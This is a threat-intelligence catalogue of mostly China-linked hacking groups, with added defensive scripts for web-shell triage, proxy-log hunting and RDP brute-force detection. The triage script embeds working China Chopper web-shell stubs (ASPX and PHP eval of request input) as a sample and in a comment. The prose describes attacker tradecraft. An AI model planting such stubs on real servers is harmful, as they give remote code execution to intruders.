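An added triage script (example code, not from Secureworks CTU or the MISP galaxy) for two of the TTPs in the paragraph above, the first of which the BRONZE EDGEWOOD entry also reports: it flags small server-side scripts that eval() raw request input in the China Chopper style, and files with a '.jpg' extension whose leading bytes carry the RAR archive signature. The China Chopper stub forms, the 4 KiB size ceiling and the sample files are assumptions constructed for the example.

```python
"""Triage checks for two of the BRONZE SPRING TTPs described above:
China Chopper web shells dropped on web servers, and RAR archives
renamed with a '.jpg' extension to disguise staged exfiltration data."""
import os
import re
from typing import Dict, List

# RAR4 files start with "Rar!\x1a\x07\x00", RAR5 with "Rar!\x1a\x07\x01\x00".
RAR_MAGIC = b"Rar!\x1a\x07"
JPEG_MAGIC = b"\xff\xd8\xff"
IMAGE_EXTENSIONS = {".jpg", ".jpeg"}
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asp", ".php"}

# China Chopper server-side stubs evaluate request input directly; the classic
# ASPX form is <%eval(Request.Item["pw"],"unsafe");%> and the PHP form is
# <?php @eval($_POST['pw']);?>. (Assumed patterns for this example.)
CHOPPER_PATTERNS = [
    re.compile(r'eval\s*\(\s*Request\.Item\s*\[', re.I),      # ASPX (JScript)
    re.compile(r'eval\s*\(\s*\$_(POST|REQUEST)\s*\[', re.I),  # PHP
]
MAX_SHELL_SIZE = 4096  # assumed: real stubs are tiny; big eval() users are usually apps


def is_rar(data: bytes) -> bool:
    """True when the first bytes carry the RAR archive signature."""
    return data.startswith(RAR_MAGIC)


def is_masquerading_archive(name: str, data: bytes) -> bool:
    """True when the extension claims a JPEG but the content is a RAR archive."""
    ext = os.path.splitext(name)[1].lower()
    return ext in IMAGE_EXTENSIONS and is_rar(data) and not data.startswith(JPEG_MAGIC)


def looks_like_china_chopper(name: str, data: bytes) -> bool:
    """True for small server-side scripts that eval() raw request input."""
    ext = os.path.splitext(name)[1].lower()
    if ext not in SCRIPT_EXTENSIONS or len(data) > MAX_SHELL_SIZE:
        return False
    text = data.decode("utf-8", errors="ignore")
    return any(p.search(text) for p in CHOPPER_PATTERNS)


def triage_file(name: str, data: bytes) -> List[str]:
    """Return the names of the checks that fired for one file."""
    findings = []
    if is_masquerading_archive(name, data):
        findings.append("rar-as-jpg")
    if looks_like_china_chopper(name, data):
        findings.append("china-chopper")
    return findings


def triage_tree(root: str) -> Dict[str, List[str]]:
    """Walk a web root or staging directory and report every file that fired a check."""
    results: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(MAX_SHELL_SIZE + 1)  # enough for both checks
            except OSError:
                continue
            hits = triage_file(fn, head)
            if hits:
                results[path] = hits
    return results


# Constructed samples (not real artefacts) that exercise each check.
SAMPLES = {
    "IMG_2031.jpg": b"Rar!\x1a\x07\x00" + b"\x00" * 64,             # RAR disguised as a photo
    "holiday.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 64,   # genuine JPEG header
    "error.aspx": b'<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "default.aspx": b'<%@ Page Language="C#" %><html><body>hello</body></html>',
}


def triage_samples() -> Dict[str, List[str]]:
    """Run the checks over the constructed samples and keep only the hits."""
    return {n: triage_file(n, d) for n, d in SAMPLES.items() if triage_file(n, d)}


if __name__ == "__main__":
    for name, hits in triage_samples().items():
        print(f"{name}: {', '.join(hits)}")
```

Point triage_tree() at a web root or a suspected staging directory during an incident; the extension-versus-magic check is cheap enough to run across a whole file server, and a '.jpg' that is really a RAR archive is worth opening regardless of which group left it.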
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRONZE SPRING.
Known Synonyms |
---|
UNC302 |
Internal MISP references
UUID 8b77424e-18bc-4ea7-baa4-d87441978e20
which can be used as unique global reference for BRONZE SPRING
in MISP communities and other software using the MISP galaxy
External references
- https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion - webarchive
- https://www.justice.gov/opa/press-release/file/1295981/download - webarchive
- https://www.justice.gov/opa/press-release/file/1295986/download - webarchive
- https://intrusiontruth.wordpress.com/2021/05/06/an-apt-with-no-name - webarchive
- https://twitter.com/MrDanPerez/status/1390285821786394624 - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['United States', 'Australia', 'Belgium', 'Germany', 'Japan', 'Lithuania', 'Netherlands', 'Spain', 'South Korea', 'Sweden', 'United Kingdom'] |
cfr-target-category | ['Information technology', 'Medical', 'Civil engineering', 'Business', 'Education', 'Gaming', 'Energy', 'Pharmaceuticals', 'Defense industrial base'] |
country | CN |
BRONZE STARLIGHT
BRONZE STARLIGHT has been active since mid-2021 and targets organizations globally across a range of industry verticals. The group leverages HUI Loader to load Cobalt Strike and PlugX payloads for command and control. CTU researchers have observed BRONZE STARLIGHT deploying ransomware to compromised networks as part of name-and-shame ransomware schemes and posting victim names to leak sites. CTU researchers assess with moderate confidence that BRONZE STARLIGHT is located in China based on observed tradecraft, including the use of HUI Loader and PlugX, which are associated with China-based threat group activity. It is plausible that BRONZE STARLIGHT deploys ransomware as a smokescreen rather than for financial gain, with the underlying motivation of intellectual property theft or espionage.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRONZE STARLIGHT.
Known Synonyms |
---|
Cinnamon Tempest |
DEV-0401 |
Emperor Dragonfly |
SLIME34 |
Internal MISP references
UUID 737c0207-1a1a-4480-86e7-b6a5066e1ee5
which can be used as unique global reference for BRONZE STARLIGHT
in MISP communities and other software using the MISP galaxy
External references
- https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation - webarchive
- https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility - webarchive
- https://twitter.com/cglyer/status/1480734487000453121 - webarchive
- https://blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-group - webarchive
- https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
BRONZE HIGHLAND
BRONZE HIGHLAND has been observed using spearphishing as an initial infection vector to deploy the MgBot remote access trojan against targets in Hong Kong. Third-party reporting suggests the threat group also targets India, Malaysia and Taiwan and leverages Cobalt Strike and the KsRemote Android RAT. CTU researchers assess with moderate confidence that BRONZE HIGHLAND operates on behalf of China and has a remit covering espionage against domestic human rights and pro-democracy advocates and nations neighbouring China.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRONZE HIGHLAND.
Known Synonyms |
---|
Daggerfly |
Evasive Panda |
Internal MISP references
UUID 62710572-e416-419d-bb1f-81ffc1ddc976
which can be used as unique global reference for BRONZE HIGHLAND
in MISP communities and other software using the MISP galaxy
External references
- https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf - webarchive
- https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s - webarchive
- https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Hong Kong', 'Malaysia', 'India', 'Taiwan', 'Macao', 'Nigeria'] |
country | CN |
BRONZE SPIRAL
In December 2020, the IT management software provider SolarWinds announced that an unidentified threat actor had exploited a vulnerability in their Orion Platform software to deploy a web shell dubbed SUPERNOVA. CTU researchers track the operators of the SUPERNOVA web shell as BRONZE SPIRAL and assess with low confidence that the group is of Chinese origin. SUPERNOVA was likely deployed through exploitation of CVE-2020-10148, and CTU researchers observed post-exploitation reconnaissance commands roughly 30 minutes before the web shell was deployed. This may have been indicative of the threat actor conducting scan-and-exploit activity and then triaging for victims of particular interest, before deploying SUPERNOVA and attempting to dump credentials and move laterally.
BRONZE SPIRAL has been associated with previous intrusions involving the targeting of ManageEngine servers, maintenance of long-term access to periodically harvest credentials and exfiltrate data, and espionage or theft of intellectual property. The threat group makes extensive use of native system tools and 'living off the land' techniques.
Internal MISP references
UUID 3f04dbbc-69bc-409b-82a1-6135f0b6a41c
which can be used as unique global reference for BRONZE SPIRAL
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/solarstorm-supernova - webarchive
- https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis - webarchive
- https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group - webarchive
- https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a - webarchive
- https://www.cisa.gov/news-events/analysis-reports/ar21-112a - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
BRONZE VAPOR
BRONZE VAPOR is a targeted threat group assessed with moderate confidence to be of Chinese origin. Artefacts from tools associated with this group and open source reporting on related incidents indicate that BRONZE VAPOR has operated since at least 2017. The group conducts espionage against multiple industries including semiconductors, aviation and telecommunications. CTU researchers assess BRONZE VAPOR's intent to be information theft, with operations focused on intellectual property (semiconductors) and personally identifiable information such as traveller records (aviation). Compromise of telecommunications companies can yield personally identifiable information and metadata on client communications such as Call Data Records (CDR).
Prior to 2019 their operational focus, with some exceptions, revolved around targets in East Asia, particularly Taiwan with its thriving semiconductor industry. In 2021 details emerged in open source of attacks on at least one European semiconductor company believed to date back to 2017. In 2019 BRONZE VAPOR attacked one or more entities in the European airlines sector. The group gains initial access via VPN services, may use spearphishing with 'Letter of Appointment' themed lures, and deploys Cobalt Strike along with custom data exfiltration tools against target organizations. Post-intrusion activity involves living off the land using legitimate tools and commands available within the victim environment, as well as using AceHash for credential harvesting, WATERCYCLE for data exfiltration and STOCKPIPE for proxying information through Microsoft Exchange servers over email.
BRONZE VAPOR uses a set of tactics that, although not individually unique, when viewed in aggregate create a relatively distinct playbook. Intrusions begin with credential-based attacks against an existing remote access solution (Citrix, VPN, etc.) or B2B network access. Cobalt Strike is deployed into the environment and further access is then conducted via Cobalt Strike Beacon and other features of the platform. SharpHound is deployed to map out the victim's Active Directory infrastructure and collect critical information about the domain, including important account names. Command and control infrastructure is hosted on subdomains of Azure and Appspot services to blend in with legitimate traffic. The threat actor also registers their own domains for command and control, often with a "sync" or "update" related theme. WinRAR is commonly used for compressing data prior to exfiltration. Filenames for these archives often involve a string of numbers and variations of the word "update". Data is exfiltrated using WATERCYCLE to cloud-based platforms such as OneDrive and Google Drive.
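An added hunting script (example code, not Secureworks CTU tooling) that turns the playbook above into three checks over web proxy logs: regular-interval requests from one client to a subdomain of a platform service such as Azure or Appspot, archive names that combine a run of digits with an "update" variant, and large single-request uploads to OneDrive or Google Drive. The log layout, the host suffixes and upload endpoints, the size and beacon thresholds and the sample lines are all assumptions constructed for the example.

```python
"""Hunt over web proxy logs for the BRONZE VAPOR playbook elements described above:
C2 blended into subdomains of Azure and Appspot, WinRAR archives named with
digits plus an "update" variant, and exfiltration to OneDrive or Google Drive."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Assumed proxy log layout (constructed for this example):
#   <epoch seconds> <client ip> <method> <host> <path> <bytes sent by client>
LOG_RE = re.compile(r"^(\d+) (\S+) (GET|POST|PUT) (\S+) (\S+) (\d+)$")

# Assumed: attacker-registered subdomains of these platform services.
CLOUD_APP_SUFFIXES = (".azurewebsites.net", ".cloudapp.azure.com", ".appspot.com")
# Assumed upload endpoints for the storage platforms named in the report.
CLOUD_STORAGE_HOSTS = {"api.onedrive.com", "onedrive.live.com",
                       "drive.google.com", "www.googleapis.com"}
# Archive names mixing a run of digits with an "update" variant, e.g. 20210614_update.rar
ARCHIVE_NAME_RE = re.compile(r"(?=.*\d{3,})(?=.*updat)[\w.-]*\.(?:rar|zip|7z)$", re.I)
UPLOAD_THRESHOLD = 10 * 1024 * 1024   # assumed: 10 MiB sent in one request
BEACON_MIN_COUNT = 5                  # assumed: requests per (client, host) pair
BEACON_MAX_JITTER = 0.2               # assumed: coefficient of variation of the gaps


def parse(line: str) -> Optional[dict]:
    """Parse one proxy log line; None when it does not match the layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, src, method, host, path, sent = m.groups()
    return {"ts": int(ts), "src": src, "method": method,
            "host": host.lower(), "path": path, "bytes_out": int(sent)}


def is_regular(times: List[int]) -> bool:
    """True when at least BEACON_MIN_COUNT requests arrive at near-constant intervals."""
    if len(times) < BEACON_MIN_COUNT:
        return False
    times = sorted(times)
    gaps = [b - a for a, b in zip(times, times[1:])]
    mean = sum(gaps) / len(gaps)
    if mean <= 0:
        return False
    var = sum((g - mean) ** 2 for g in gaps) / len(gaps)
    return (var ** 0.5) / mean <= BEACON_MAX_JITTER


def hunt(lines) -> List[dict]:
    """Apply the three hunts and return one finding per hit."""
    findings: List[dict] = []
    beacons: Dict[Tuple[str, str], List[int]] = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        filename = rec["path"].rsplit("/", 1)[-1]
        if ARCHIVE_NAME_RE.match(filename):
            findings.append({"rule": "update-themed-archive", "filename": filename, **rec})
        if rec["host"].endswith(CLOUD_APP_SUFFIXES):
            beacons[(rec["src"], rec["host"])].append(rec["ts"])
        if (rec["host"] in CLOUD_STORAGE_HOSTS and rec["method"] in ("POST", "PUT")
                and rec["bytes_out"] >= UPLOAD_THRESHOLD):
            findings.append({"rule": "bulk-cloud-upload", **rec})
    for (src, host), times in beacons.items():
        if is_regular(times):
            findings.append({"rule": "cloud-subdomain-beaconing", "src": src,
                             "host": host, "count": len(times)})
    return findings


# Constructed log lines (not real traffic): a 60-second beacon, a 50 MiB archive
# upload to OneDrive, and two benign requests that should not fire.
SAMPLE_LOG = """\
1623672000 10.1.2.3 GET sync-update.azurewebsites.net /api/v1/check 312
1623672060 10.1.2.3 GET sync-update.azurewebsites.net /api/v1/check 310
1623672120 10.1.2.3 GET sync-update.azurewebsites.net /api/v1/check 315
1623672180 10.1.2.3 GET sync-update.azurewebsites.net /api/v1/check 309
1623672240 10.1.2.3 GET sync-update.azurewebsites.net /api/v1/check 311
1623672300 10.1.2.3 PUT api.onedrive.com /v1.0/drive/items/upload/20210614_update.rar 52428800
1623672400 10.1.2.9 GET www.example.com /news/update.html 2048
1623672500 10.1.2.9 POST drive.google.com /upload/holiday.zip 20480
"""


def hunt_sample() -> List[dict]:
    """Run the hunts over the constructed sample log."""
    return hunt(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in hunt_sample():
        print(f["rule"], f.get("host"), f.get("filename", ""), f.get("count", ""))
```

None of the three rules is conclusive alone: plenty of legitimate software polls Azure-hosted endpoints on a timer, and "update" archives are common. The value is in the overlap, so triage a client that trips the beaconing rule and then appears in a bulk upload or archive-name hit, as 10.1.2.3 does in the sample.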
Internal MISP references
UUID af12a336-bb68-41ff-866a-834cedc0b5fc
which can be used as unique global reference for BRONZE VAPOR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Taiwan'] |
cfr-target-category | ['Semiconductor Industry'] |
country | CN |
Vicious Panda
Check Point Research discovered a new campaign against the Mongolian public sector, which takes advantage of the current Coronavirus scare, in order to deliver a previously unknown malware implant to the target. A closer look at this campaign allowed us to tie it to other operations which were carried out by the same anonymous group, dating back to at least 2016. Over the years, these operations targeted different sectors in multiple countries, such as Ukraine, Russia, and Belarus.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vicious Panda.
Known Synonyms |
---|
SixLittleMonkeys |
Internal MISP references
UUID 68d8c25b-8595-4c20-a5c7-a11a2a34b717
which can be used as unique global reference for Vicious Panda
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/microcin-is-here/97353 - webarchive
- https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636 - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia - webarchive
- https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia - webarchive
- https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign - webarchive
- https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897 - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937 - webarchive
- https://securelist.com/it-threat-evolution-q2-2020/98230 - webarchive
- https://securelist.com/apt-trends-report-q3-2021/104708 - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Belarus', 'Russia', 'Mongolia', 'Ukraine'] |
country | CN |
Red Nue
Red Nue, active since at least 2017, is known for its use of the multi-platform LootRAT backdoor, also known as ReverseWindow. LootRAT has variants for Windows and macOS (reported in open source as Demsty), as well as an Android variant known as SpyDealer. Red Nue has also used another Windows backdoor known as WinDealer since at least 2019, when it deployed it to targets as part of a watering hole campaign on a Chinese news website for the Chinese diaspora community. Parts of Asia feature heavily in Red Nue's victimology.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Red Nue.
Known Synonyms |
---|
LuoYu |
Internal MISP references
UUID c73c8a76-1e44-44d6-b955-79f3a73582a1
which can be used as unique global reference for Red Nue
in MISP communities and other software using the MISP galaxy
External references
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2021/10/windealer.html - webarchive
- https://securelist.com/windealer-dealing-on-the-side/105946 - webarchive
- https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malware - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Pickaxe
Prying Libra, also known as Pickaxe, is a threat actor active since at least August 2017 and still active at the time of writing. The adversary's goal is to install and maintain a popular cryptocurrency miner on the victim's machine: the open-source XMRig tool, which mines the Monero cryptocurrency. The malware is delivered via downloads through the popular Adfly advertisement platform; users are misled into clicking on a malicious advertisement, which results in the payload being delivered to the victim. Once installed, the malware uses VBS scripts and URL-shortening services such as bitly to download and execute XMRig. Over 15 million confirmed victims have been found infected in recent campaigns, and the actual number is likely between 30 and 45 million. Victims are found across the globe, with high concentrations in Thailand, Vietnam, Egypt, Indonesia, and Turkey.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pickaxe.
Known Synonyms |
---|
Prying Libra |
Internal MISP references
UUID 1bfd16ae-fd98-4a96-9397-d1651548bda2
which can be used as unique global reference for Pickaxe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Watchdog
Thief Libra is a cloud-focused threat group with a history of cryptojacking operations as well as cloud service platform credential scraping. It was first observed operating on January 27, 2019. The group uses a variety of custom-built Go scripts as well as cryptojacking scripts repurposed from other groups, including TeamTNT. It is currently considered an opportunistic threat group that targets exposed cloud instances and applications.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Watchdog.
Known Synonyms |
---|
Thief Libra |
Internal MISP references
UUID 4b4b4717-d31e-4be6-a3ba-b13edb42decd
which can be used as unique global reference for Watchdog
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Returned Libra
Returned Libra, also known as 8220 Mining Group, is a cloud threat actor group that has been active since at least 2017. Tools commonly employed during its operations are PwnRig and DBUsed, which are customized variants of the XMRig Monero mining software. The Returned Libra mining group is believed to have originated from a GitHub fork of the Rocke group's software. Returned Libra has elevated its mining operations with the use of cloud service platform credential scraping.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Returned Libra.
Known Synonyms |
---|
8220 Mining Group |
Internal MISP references
UUID 7831d56e-5913-44ca-8835-f42017aeb0cd
which can be used as unique global reference for Returned Libra
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TianWu
Internal MISP references
UUID a3831248-5e2f-492d-8bb6-5e82c2f6481d
which can be used as unique global reference for TianWu
in MISP communities and other software using the MISP galaxy
External references
- https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf - webarchive
- https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf - webarchive
- https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies - webarchive
- https://github.com/avast/ioc/tree/master/OperationDragonCastling - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 75 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['China', 'Hong Kong', 'Kazakhstan', 'Taiwan', 'Philippines'] |
cfr-target-category | ['Private Sector', 'Gambling companies', 'Gaming', 'Information technology', 'Telecommunications', 'Government', 'Transportation systems', 'Dissident'] |
country | CN |
SLIME29
Internal MISP references
UUID d58030e2-5673-4836-9aff-ab6d55da0bc0
which can be used as unique global reference for SLIME29
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 75 |
cfr-suspected-state-sponsor | China |
cfr-target-category | ['Private Sector'] |
country | CN |
GOBLIN PANDA
Goblin Panda is one of a handful of elite Chinese advanced persistent threat (APT) groups. Most Chinese APTs target the United States and NATO, but Goblin Panda focuses primarily on Southeast Asia.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GOBLIN PANDA.
Known Synonyms |
---|
Conimes |
Cycldek |
Internal MISP references
UUID 8d73715a-8bbd-4eaa-ae24-2f1b1c84cf21
which can be used as unique global reference for GOBLIN PANDA
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/ - webarchive
- https://securelist.com/cycldek-bridging-the-air-gap/97157/ - webarchive
- https://www.fortinet.com/blog/threat-research/cta-security-playbook--goblin-panda.html - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://cyberthreat.thalesgroup.com/sites/default/files/2022-05/THALES%20THREAT%20HANDBOOK%202022%20Light%20Version_1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 75 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Malaysia', 'India', 'Indonesia', 'Japan', 'Philippines', 'Southeast Asia', 'South Korea', 'Vietnam'] |
cfr-target-category | ['Private Sector'] |
country | CN |
TA558
Since 2018, security researchers tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and sometimes North America, and western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads.
Internal MISP references
UUID e1e70539-8916-45c2-9b01-891c1c5bd8a1
which can be used as unique global reference for TA558
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
sources | ['https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel'] |
PARINACOTA
PARINACOTA is one of the actors that has emerged in the trend of human-operated ransomware attacks: an active, highly adaptive group that frequently drops Wadhrama as its payload. It impacts three to four organizations every week and appears quite resourceful: over 18 months of monitoring, the group was observed changing tactics to match its needs and using compromised machines for various purposes, including cryptocurrency mining, sending spam email, or proxying for other attacks. The group's goals and payloads have shifted over time, influenced by the type of compromised infrastructure, but in recent months it has mostly deployed the Wadhrama ransomware. The group most often employs a smash-and-grab method, attempting to infiltrate a machine in a network and proceeding to ransom it in less than an hour. There are outlier campaigns in which it attempts reconnaissance and lateral movement, typically when it lands on a machine and network that allow it to move quickly and easily throughout the environment.
PARINACOTA typically brute-forces its way into servers that have Remote Desktop Protocol (RDP) exposed to the internet, with the goal of moving laterally inside the network or performing further brute-force activity against targets outside it, which expands the compromised infrastructure under the group's control. The group frequently targets built-in local administrator accounts or a list of common account names; in other instances it targets Active Directory (AD) accounts that it has compromised or has prior knowledge of, such as service accounts of known vendors. The group adopted the RDP brute-force technique that the older Samas ransomware (also known as SamSam) infamously used; other malware families such as GandCrab, MegaCortex, LockerGoga, Hermes, and RobbinHood have also used this method in targeted ransomware attacks.
PARINACOTA has, however, also been observed adapting to any path of least resistance it can find. For instance, it sometimes discovers unpatched systems and uses disclosed vulnerabilities to gain initial access or elevate privileges.
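As an added example (not code from the original page or from the reporting on PARINACOTA), the following Python detects the RDP brute-force pattern described above over a few constructed Windows Security log lines: it counts 4625 failures with LogonType 10 (RemoteInteractive, i.e. RDP) per source address in a sliding window, reports which built-in administrator or other common account names were targeted, and notes when a 4624 success from the same address follows the burst. The flattened line format, the threshold of five failures per minute, and the list of common account names are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a flattened key=value form modelled on Windows Security events
# 4625 (failed logon) and 4624 (successful logon). These lines are made up for this
# example; the addresses are RFC 5737 documentation ranges, not real infrastructure.
SAMPLE_LOG = """\
2020-03-01T10:00:01Z EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.10
2020-03-01T10:00:03Z EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.10
2020-03-01T10:00:05Z EventID=4625 LogonType=10 TargetUserName=backup IpAddress=203.0.113.10
2020-03-01T10:00:08Z EventID=4625 LogonType=10 TargetUserName=test IpAddress=203.0.113.10
2020-03-01T10:00:12Z EventID=4625 LogonType=10 TargetUserName=sqlsvc IpAddress=203.0.113.10
2020-03-01T10:00:15Z EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.10
2020-03-01T10:01:30Z EventID=4624 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.10
2020-03-01T10:05:00Z EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
2020-03-01T11:00:00Z EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
2020-03-01T11:00:20Z EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<event_id>\d+) LogonType=(?P<logon_type>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)

# Assumed list of account names a password sprayer typically tries first.
COMMON_TARGETS = {"administrator", "admin", "backup", "test", "user", "guest", "sql"}

RDP_LOGON_TYPE = 10


def parse_events(text):
    """Parse the flattened lines into dicts, sorted by timestamp."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        events.append({
            "ts": datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": int(d["event_id"]),
            "logon_type": int(d["logon_type"]),
            "user": d["user"],
            "ip": d["ip"],
        })
    events.sort(key=lambda e: e["ts"])
    return events


def detect_rdp_bruteforce(events, window=timedelta(seconds=60), threshold=5):
    """Return one alert per source IP whose RDP failures reach `threshold` within `window`.

    Each alert records the peak failure count, the common/admin names that were tried,
    and any successful RDP logon from the same IP at or after the end of the burst
    (the sign that the brute force worked)."""
    failures = defaultdict(list)   # ip -> [(ts, user), ...]
    successes = defaultdict(list)  # ip -> [(ts, user), ...]
    for e in events:
        if e["logon_type"] != RDP_LOGON_TYPE:
            continue
        if e["event_id"] == 4625:
            failures[e["ip"]].append((e["ts"], e["user"]))
        elif e["event_id"] == 4624:
            successes[e["ip"]].append((e["ts"], e["user"]))

    alerts = {}
    for ip, fails in failures.items():
        # Sliding window over the time-ordered failures from this source.
        start, best, burst_end = 0, 0, None
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            count = end - start + 1
            if count > best:
                best, burst_end = count, fails[end][0]
        if best < threshold:
            continue
        targeted = {u.lower() for _, u in fails}
        alerts[ip] = {
            "max_failures_in_window": best,
            "common_accounts_targeted": sorted(targeted & COMMON_TARGETS),
            "success_after_burst": [(ts, u) for ts, u in successes[ip] if ts >= burst_end],
        }
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_rdp_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(ip, alert)
```

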